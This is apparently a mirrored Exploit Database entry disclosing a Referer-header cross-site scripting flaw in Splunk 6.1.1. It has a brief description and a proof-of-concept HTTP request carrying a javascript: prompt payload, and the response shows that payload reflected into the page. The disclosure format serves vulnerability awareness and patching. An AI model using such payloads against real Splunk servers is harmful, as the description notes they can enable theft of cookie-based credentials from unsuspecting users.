Splunk 6.1.1 – ‘Referer’ Header Cross-Site Scripting

• Exploit Database
• 127 阅读

• 作者： justpentest
  日期： 2017-01-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40997/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

  # Exploit Title: Splunk &apos;Referer&apos; Header Cross Site Scripting Vulnerability # Date: 7th January 2017 # Exploit Author: justpentest # Vendor Homepage: http://www.splunk.com/ # Version: Splunk 6.1.1 other versions may also be affected. # Contact: transform2secure@gmail.com     Source: https://www.securityfocus.com/bid/67655/info 1) Description: Splunk is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in an unsuspecting user&apos;s browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 2) Exploit: URL: http://justpentest.com:8000/en-US/app/ GET /en-US/app/ HTTP/1.1 Host=justpentest.com:8000 User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate Referer=javascript:prompt("XXS by justpentest"); Connection=keep-alive ---------------------------------------------------------------------------------------- Response: <p>This page was linked to from <a href="javascript:prompt("XXS by justpentest");">javascript:prompt("XXS by justpentest");</a>.</p>